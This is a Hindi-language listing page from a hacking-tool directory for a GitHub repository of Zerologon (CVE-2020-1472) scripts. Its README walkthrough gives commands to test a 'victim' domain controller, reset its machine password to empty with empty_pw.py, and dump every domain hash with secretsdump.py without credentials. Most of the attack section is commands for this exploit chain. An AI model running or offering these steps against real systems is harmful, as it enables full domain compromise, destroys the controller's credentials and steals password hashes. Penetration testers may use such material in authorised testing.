Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
zerologon — zerologon भेद्यता (CVE-2020-1472) का परीक्षण और शोषण करने के लिए स्क्रिप्ट का सेट। | Kitploit
उपकरण/GitHubGitHub/carlos55ml/zerologon
विशेषाधिकार वृद्धिपासवर्ड हमलेभेद्यता विश्लेषणशोषणपार्श्व आंदोलनपेनिट्रेशन टेस्टिंग
GitHubcarlos55ml/zerologon

zerologon

zerologon भेद्यता (CVE-2020-1472) का परीक्षण और शोषण करने के लिए स्क्रिप्ट का सेट।

रिपॉजिटरी देखें
24 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Zerologon

स्क्रिप्ट्स का सेट, zerologon कमजोरी (CVE-2020-1472) का परीक्षण और शोषण करने के लिए


बैनर

यह क्या है?

ZeroLogon एक कमजोरी है जो हमें माइक्रोसॉफ्ट के एक्टिव डायरेक्टरी Netlogon रिमोट प्रोटोकॉल (MS-NRPC) में क्रिप्टोग्राफी दोष का शोषण करने की अनुमति देती है, जो उपयोगकर्ताओं को NTLM का उपयोग करके सर्वरों में लॉग इन करने की अनुमति देता है।


पिछले कदम

एक्सप्लॉइट को निष्पादित करने से पहले हमें पता होना चाहिए कि हमें impacket का एक अलग संस्करण चाहिए, इसके लिए हम निम्नलिखित करेंगे।

apt remove --purge impacket-scripts python3-impacket

git clone https://github.com/SecureAuthCorp/impacket.git

cd impacket

pip install .


PoC (प्रूफ ऑफ कॉन्सेप्ट)

git clone https://github.com/Nekoox/zerologon.git

cd zerologon

pip install -r requirements.txt

जांचें कि क्या पीड़ित डोमेन नियंत्रक zerologon के प्रति संवेदनशील है।

python3 tester.py <DC-NAME> <ip-address>

यदि पीड़ित DC संवेदनशील है, तो एक संदेश आएगा जिसमें कहेगा "सफलता! Zerologon हमले द्वारा DC को पूरी तरह से समझौता किया जा सकता है।"

अन्यथा, अर्थात्, पीड़ित DC संवेदनशील नहीं है क्योंकि सुरक्षा छेद को पैच किया गया है, हमें निम्नलिखित संदेश मिलेगा "हमला विफल हुआ। लक्ष्य संभवतः पैच किया गया है।"


संवेदनशील डोमेन नियंत्रक के पासवर्ड को खाली स्ट्रिंग में बदलें।

python3 empty_pw.py <DC-NAME> <ip-address>

यदि डोमेन नियंत्रक संवेदनशील है, तो एक्सप्लॉइट चलाने के बाद उसके पास कोई पासवर्ड नहीं होना चाहिए।

डोमेन नियंत्रक के हैश डंप करें।

> secretsdump.py -just-dc <DC-NAME>\$@<ip-address>

इसे निष्पादित करके, हम बिना किसी क्रेडेंशियल के डोमेन के सभी हैश देख पाएंगे।

टूल डाउनलोड करें